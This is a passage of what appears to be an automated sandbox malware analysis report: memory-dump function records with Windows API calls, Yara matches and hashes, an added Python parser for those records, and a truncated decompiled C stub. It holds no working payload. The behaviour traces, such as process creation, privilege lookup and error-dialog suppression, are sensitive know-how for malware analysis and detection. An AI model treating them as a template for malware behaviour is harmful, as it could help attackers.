• Opcode ID: 5803e25312753783f871642106ae3b76d2a9655e850ef99ab97e990b37012f08
• Instruction ID: 180db98f1f9967267a980eee3dae7f60ff71dc6fd7c6986dad56fafdd8f7d7e3
• Opcode Fuzzy Hash: 5803e25312753783f871642106ae3b76d2a9655e850ef99ab97e990b37012f08
• Instruction Fuzzy Hash: C99002B120100903F1817559440564A0019D7D1345F91C015A4016659DDA55DA9977E1
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 093abc455429ed2f58dbe540ab8508bbbc149cf56ea82142b9336dad15f384a0
• Instruction ID: caf2e67910b9b7563b2d2583c4630135e9bebe7a16d99f8d6119f001cd2762e9
• Opcode Fuzzy Hash: 093abc455429ed2f58dbe540ab8508bbbc149cf56ea82142b9336dad15f384a0
• Instruction Fuzzy Hash: 129002B120504943F14175594405A460029D7D0349F51C011A4055699DA665DD95B6A1
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 260d7d41bf8a771a0309e7be06630efaded0f9c26b22aaf59ff8cd177bd93dcf
• Instruction ID: a12e51d23f88d1d5e5994ad2562f806a051dd781dd611e1d8f96b8d4539b8699
• Opcode Fuzzy Hash: 260d7d41bf8a771a0309e7be06630efaded0f9c26b22aaf59ff8cd177bd93dcf
• Instruction Fuzzy Hash: 349002B120108903F1116559840574A0019D7D0345F55C411A841565DD96D5D8D17161
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: bc3cf2d3e7afb6bda1fb32f175177da796b7be0726d271f4a3e4daf875b0b69f
• Instruction ID: 1d456ef3a59010c2b6d15f1b7525137ea1bfb0c29defb071e7a91a216ec27b79
• Opcode Fuzzy Hash: bc3cf2d3e7afb6bda1fb32f175177da796b7be0726d271f4a3e4daf875b0b69f
• Instruction Fuzzy Hash: 7E9002B120100943F10165594405B460019D7E0345F51C016A4115659D9655D8917561
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 975dfaf3ce2049f74821bcda51ef72e559159a7472164cfd9662c9fd4eec6b1c
• Instruction ID: 56dc98f84ca73fcab2854fd405bf7692b00c15375beabc98ce7afa866c174bc6
• Opcode Fuzzy Hash: 975dfaf3ce2049f74821bcda51ef72e559159a7472164cfd9662c9fd4eec6b1c
• Instruction Fuzzy Hash: 6E9002B120100503F101699954096460019D7E0345F51D011A901555AED6A5D8D17171
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 5db9fe772aaca13455620323b670b65babe4bb0dca64ff3fea21fc3da4f6dbc6
• Instruction ID: daeb4400099d14f7c380191e2599bc8da0ecff625180755bb47a8476e0906ba7
• Opcode Fuzzy Hash: 5db9fe772aaca13455620323b670b65babe4bb0dca64ff3fea21fc3da4f6dbc6
• Instruction Fuzzy Hash: FD9002B131114503F111655984057060019D7D1245F51C411A481555DD96D5D8D17162
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 13492bcab119dea077100805926a5f4cd50eee9052fc9bb1171a09638704f332
• Instruction ID: d91dc03c6491d486ccae4bcd9c02d6ac579e4178647a9bd2f7315cf07e83e9e1
• Opcode Fuzzy Hash: 13492bcab119dea077100805926a5f4cd50eee9052fc9bb1171a09638704f332
• Instruction Fuzzy Hash: 079002A921300103F1817559540960A0019D7D1246F91D415A400655DCD955D8A96361
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 9c067592516290d32116a341a9f59be4174967573d086e1fe6ab4fbd69447d4a
• Instruction ID: 33ee846ddb0b1525da0b786db1a73792e3db8b4671f069bce6c5ef40bca40be3
• Opcode Fuzzy Hash: 9c067592516290d32116a341a9f59be4174967573d086e1fe6ab4fbd69447d4a
• Instruction Fuzzy Hash: 769002B120100513F11265594505707001DD7D0285F91C412A441555DDA696D992B161
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b7ad7fc0cc3517166656130499a17706c06e4952d8b42f1ff9ab5f19b4f8d2d4
• Instruction ID: 301089024433c825ee46aa1d558d40c2b86a9098042c9d71c8e717fca164357a
• Opcode Fuzzy Hash: b7ad7fc0cc3517166656130499a17706c06e4952d8b42f1ff9ab5f19b4f8d2d4
• Instruction Fuzzy Hash: 939002A1242042537546B5594405507401AE7E0285B91C012A5405955C9566E896E661
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a6d6b8c5f459265d809a12f77a38178abd1ddc8febd638e9293d8eadbf3ba7ca
• Instruction ID: e04a9ae76e073f71967c26d00bdeef5c4828c0c408723128754848ae8f552176
• Opcode Fuzzy Hash: a6d6b8c5f459265d809a12f77a38178abd1ddc8febd638e9293d8eadbf3ba7ca
• Instruction Fuzzy Hash: 519002F120100503F141755944057460019D7D0345F51C011A9055559E9699DDD576A5
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 66a12dcadf3521f0096f42c0e0fee863b1c4e7803f3e0341b80213e6bd1ec29b
• Instruction ID: 24486741d171a67ba959bbf26b8fdb21c1002a2a042456b43b629fce3430b437
• Opcode Fuzzy Hash: 66a12dcadf3521f0096f42c0e0fee863b1c4e7803f3e0341b80213e6bd1ec29b
• Instruction Fuzzy Hash: 319002E134100543F10165594415B060019D7E1345F51C015E5055559D9659DC927166
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 11c2b7e862cd181b4db13dbf52209e8b5676bd64d8dd31549ce7da0460bb34c8
• Instruction ID: 237eea2a4491225977ff3a910fc53927bbd844d98cdb97bfdc884d6d725d7315
• Opcode Fuzzy Hash: 11c2b7e862cd181b4db13dbf52209e8b5676bd64d8dd31549ce7da0460bb34c8
• Instruction Fuzzy Hash: 5C9002A121180143F20169694C15B070019D7D0347F51C115A4145559CD955D8A16561
Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Sleep.KERNELBASE(000007D0), ref: 02BB6F78
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: net.dll$wininet.dll
                                                                              • API String ID: 3472027048-1269752229
                                                                              • Opcode ID: b68cd7a2022293f8b0ae9faa7826afc8d8a1f6c3102b37f9d1d84b4608bdc5e0
                                                                              • Instruction ID: 6bf55003886b50e6c1ebc7575bed658fbe5108997e4a9a0e3240e25b2c7ba6da
                                                                              • Opcode Fuzzy Hash: b68cd7a2022293f8b0ae9faa7826afc8d8a1f6c3102b37f9d1d84b4608bdc5e0
                                                                              • Instruction Fuzzy Hash: 673170B5641704ABC716DFA4C8A4FABB7B9EF48700F04845DF61A5B240D7B0B945CBE1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Sleep.KERNELBASE(000007D0), ref: 02BB6F78
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: net.dll$wininet.dll
                                                                              • API String ID: 3472027048-1269752229
                                                                              • Opcode ID: 66d72b2b44c209b42a32ca1814a6a74227a71274750b4abf3ecfef2e3bb21ee4
                                                                              • Instruction ID: ee84d8fdf68091392de69056fc44b0ee1dfbd57451c98f0094d3ab94a98937d7
                                                                              • Opcode Fuzzy Hash: 66d72b2b44c209b42a32ca1814a6a74227a71274750b4abf3ecfef2e3bb21ee4
                                                                              • Instruction Fuzzy Hash: AA3181B5545604ABCB11DFA4C8A5FAABBB9EF48700F14805DF6196B241D3B0A845CFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02BA3B93), ref: 02BB84ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID: .z`
                                                                              • API String ID: 3298025750-1441809116
                                                                              • Opcode ID: 748594d3e6e12f22c9b1014ccf7ef959ffeacd37c5f8fb21e392075ca47dd746
                                                                              • Instruction ID: e8c534719231af60dcb01fc6b24f72d027b76d545fb416daa1c9d366e8c9ae85
                                                                              • Opcode Fuzzy Hash: 748594d3e6e12f22c9b1014ccf7ef959ffeacd37c5f8fb21e392075ca47dd746
                                                                              • Instruction Fuzzy Hash: 69E092712102146BD718EF58DC85EE777ADEF88760F108A85FE0D5B241C970ED118AE0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02BA3B93), ref: 02BB84ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID: .z`
                                                                              • API String ID: 3298025750-1441809116
                                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                              • Instruction ID: 90b9102a9db9cc6980c9897f69055365a911bed49d4fd8d0012a3fb8fa4bec60
                                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                              • Instruction Fuzzy Hash: E8E01AB12002046BDB14DF59CC44EE777ADAF88750F014559BA0857251C630E9108AF0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02BA72BA
                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02BA72DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                              • Instruction ID: 4ff89aaff8798b4d831fbd5fae47c1ca4590b759917cfe7a2caa805465f05625
                                                                              • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                              • Instruction Fuzzy Hash: BE01A731A8472876EB21A6949C42FFE776C9F01B50F140595FF04BA1C1E6E479064AF5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02BA9B82
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                              • Instruction ID: d0c752699066f53729c2d53e8d5fb215323744223caa7d3dd30105debe8c7682
                                                                              • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                              • Instruction Fuzzy Hash: 05010CB5D4020DABDF10EAA4DC41FEEB3B99F54308F0081D5A90897240F671EB54CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02BB8584
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: 8e4d3f649a18802cb4debfef868fee7beff59981d6ad1a88c7ac0c47c217010b
                                                                              • Instruction ID: 94b81aa192e530a62302f64f7f21cdf261f35acfa6c9947e321208a0b82b8b30
                                                                              • Opcode Fuzzy Hash: 8e4d3f649a18802cb4debfef868fee7beff59981d6ad1a88c7ac0c47c217010b
                                                                              • Instruction Fuzzy Hash: 340192B2200108AFCB54CF99DC80EEB77A9AF8C354F158258BA0D97250CA30E851CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02BB8584
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                              • Instruction ID: d1f6e37932fbb2e75969e2505243d5f5b2940a7719db54c1c952c6e8da88bf98
                                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                              • Instruction Fuzzy Hash: 08015FB2214108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97251D630E851CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02BACCC0,?,?), ref: 02BB703C
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread
                                                                              • String ID:
                                                                              • API String ID: 2422867632-0
                                                                              • Opcode ID: c3e563e220a415f9e67350fe2ce3a483144250edd434558a5de71cd5c41fe235
                                                                              • Instruction ID: b2391ff39e9c7d2884245a237f30d38bcf4c5866de3e797f8866eb9d400b380d
                                                                              • Opcode Fuzzy Hash: c3e563e220a415f9e67350fe2ce3a483144250edd434558a5de71cd5c41fe235
                                                                              • Instruction Fuzzy Hash: E1E06D333802043AE2316599AC02FE7B29DCB85B20F540066FA0DEA2C0D9D5F80146A4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02BACF92,02BACF92,?,00000000,?,?), ref: 02BB8650
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LookupPrivilegeValue
                                                                              • String ID:
                                                                              • API String ID: 3899507212-0
                                                                              • Opcode ID: b7d7bd2bd5890dc774dbbe79e3763a03e5a3a33b226e43db48543f46a19fdde8
                                                                              • Instruction ID: 36a8d7aed9c8ae8582e34445f2be2d13c79e08fff8dda27da0ad8f4d51b1e273
                                                                              • Opcode Fuzzy Hash: b7d7bd2bd5890dc774dbbe79e3763a03e5a3a33b226e43db48543f46a19fdde8
                                                                              • Instruction Fuzzy Hash: 80F039B1600204AFDB14DF54CCC4EEB37AAEF99310F1185A9F90D9B252DA35A8168BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02BACF92,02BACF92,?,00000000,?,?), ref: 02BB8650
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LookupPrivilegeValue
                                                                              • String ID:
                                                                              • API String ID: 3899507212-0
                                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                              • Instruction ID: abdd1933fc4eeea169f1d9b2bef95a58df758e9bab4d1397897c92af048e4e7a
                                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                              • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC84EEB37ADAF88650F018555BA0857241C930E8108BF5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(02BB3506,?,02BB3C7F,02BB3C7F,?,02BB3506,?,?,?,?,?,00000000,00000000,?), ref: 02BB84AD
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                              • Instruction ID: 2ba3532a3141218e176aad53370b463f27471cdf6abb92fb4248403dca48ee73
                                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                              • Instruction Fuzzy Hash: D1E012B1200208ABDB14EF99CC80EEB77ADAF88650F118599BA085B241CA30F9108AF0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02BA7C63,?), ref: 02BAD42B
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                              • Instruction ID: 9ffdf387f88f78f5a54185e3e02e584eefeff701ebbbe8acb50f4659f4f71195
                                                                              • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                              • Instruction Fuzzy Hash: CCD0A7757903043BE610FEA49C03F6632CD9B48B04F4940A4F948D73C3DE60F4004571
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02BA7C63,?), ref: 02BAD42B
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: c729179f8b6f1661c442984c0238062cb98c8916debb2e7f0aff21fb2a29972b
                                                                              • Instruction ID: 9e4f683e6be229beb92bac61f36c47f3a3a857d5451ed67fdc43487c4126a9ac
                                                                              • Opcode Fuzzy Hash: c729179f8b6f1661c442984c0238062cb98c8916debb2e7f0aff21fb2a29972b
                                                                              • Instruction Fuzzy Hash: FED0A7757803013AE610EFA49D02F6632869B45704F0D40A5F54CEA3C3DA60E0004520
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 2283edae011e033a5d2807ed068e0d8d111ca24eedc0fd525b8b183dcdbd9e1c
                                                                              • Instruction ID: f1663a01ee27faf67ca5d9dccfda07e86f19c6f4371ee49c321067a3c1fc0227
                                                                              • Opcode Fuzzy Hash: 2283edae011e033a5d2807ed068e0d8d111ca24eedc0fd525b8b183dcdbd9e1c
                                                                              • Instruction Fuzzy Hash: 45B02BF19420C1C6FB01DB7006087173900B7D0300F12C011D1020241A0338D0C0F1B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%
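
The per-function records above (an API reference with its call site, the memory dump it was found in, the Similarity keys API ID / String ID / API String ID / Opcode ID / fuzzy hashes, and a uniqueness score) follow a fixed layout, and the report lists the same call site more than once under different Opcode IDs (for example the two Sleep records and the two SetErrorMode records). The Python below is an added example written for this page, not Joe Sandbox code and not part of the report: it parses records in that layout, groups them by API String ID, collapses the observed calls to one entry per call site, and names the bits in the SetErrorMode argument. SAMPLE is constructed by copying three of the records above in the report's own layout; the SEM_* flag values are taken from the Win32 API, not from the report.

```python
"""Parse Joe Sandbox per-function records (added example, not report output)."""
import re

# Constructed sample: three records copied from the report above in its own layout
# (two Sleep records differing only in Opcode ID, and one SetErrorMode record).
SAMPLE = """
APIs
• Sleep.KERNELBASE(000007D0), ref: 02BB6F78
Memory Dump Source
• Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: b68cd7a2022293f8b0ae9faa7826afc8d8a1f6c3102b37f9d1d84b4608bdc5e0
Uniqueness
Uniqueness Score: -1.00%
APIs
• Sleep.KERNELBASE(000007D0), ref: 02BB6F78
Memory Dump Source
• Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 66d72b2b44c209b42a32ca1814a6a74227a71274750b4abf3ecfef2e3bb21ee4
Uniqueness
Uniqueness Score: -1.00%
APIs
• SetErrorMode.KERNELBASE(00008003,?,?,02BA7C63,?), ref: 02BAD42B
Memory Dump Source
• Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Uniqueness
Uniqueness Score: -1.00%
"""

# Section headers used by the report; 'Strings' and 'Yara matches' may be empty.
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Yara matches", "Similarity", "Uniqueness"}
API_RE = re.compile(r"^• (?P<name>\w+)\.(?P<module>[\w.]+)\((?P<args>[^)]*)\), "
                    r"ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^• Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), "
                       r"based on PE: (?P<pe>true|false)$")
KV_RE = re.compile(r"^• (?P<key>[A-Za-z ]+): ?(?P<value>.*)$")
# Win32 SetErrorMode flag values (from the Win32 API, not from the report).
SEM_FLAGS = {0x1: "SEM_FAILCRITICALERRORS", 0x2: "SEM_NOGPFAULTERRORBOX", 0x8000: "SEM_NOOPENFILEERRORBOX"}


def parse_records(text):
    """One dict per record: API calls, dump source, Similarity keys, uniqueness score."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                      # every record starts with an APIs header
            rec = {"apis": [], "source": None, "meta": {}, "uniqueness": None}
            records.append(rec)
            section = line
            continue
        if rec is None:                         # text before the first record
            continue
        if line in SECTIONS:
            section = line
            continue
        if line.startswith("Uniqueness Score:"):
            rec["uniqueness"] = float(line.split(":", 1)[1].strip().rstrip("%"))
        elif section == "APIs" and (m := API_RE.match(line)):
            rec["apis"].append({"name": m["name"], "module": m["module"],
                                "args": [a for a in m["args"].split(",") if a],
                                "ref": int(m["ref"], 16)})
        elif section == "Memory Dump Source" and (m := SOURCE_RE.match(line)):
            rec["source"] = {"file": m["file"], "offset": int(m["offset"], 16),
                             "based_on_pe": m["pe"] == "true"}
        elif section == "Similarity" and (m := KV_RE.match(line)):
            rec["meta"][m["key"]] = m["value"]
    return records


def group_by_api_string_id(records):
    """Group records that share an API String ID (same API set and strings)."""
    groups = {}
    for rec in records:
        groups.setdefault(rec["meta"].get("API String ID", ""), []).append(rec)
    return groups


def unique_api_calls(records):
    """Collapse observed calls to one entry per (module, API name, call site)."""
    calls = {}
    for rec in records:
        for call in rec["apis"]:
            calls.setdefault((call["module"], call["name"], call["ref"]), call["args"])
    return calls


def decode_error_mode(mode):
    """Name the SEM_* bits set in a SetErrorMode argument such as 0x8003."""
    return [name for bit, name in sorted(SEM_FLAGS.items()) if mode & bit]
```

Feeding the whole function listing of the report to parse_records and then unique_api_calls gives the set of distinct call sites (module, API, address) in the 02BA0000 region without the duplicate records; the API String ID groups show which records are the same function seen from different dumps. decode_error_mode(0x8003) returns the three SEM_* names for the SetErrorMode argument recorded above, which suppresses the critical-error, GP-fault and open-file error dialogs.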

                                                                              Non-executed Functions

                                                                              C-Code - Quality: 53%
                                                                              			E0469FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                              				void* _t7;
                                                                              				intOrPtr _t9;
                                                                              				intOrPtr _t10;
                                                                              				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
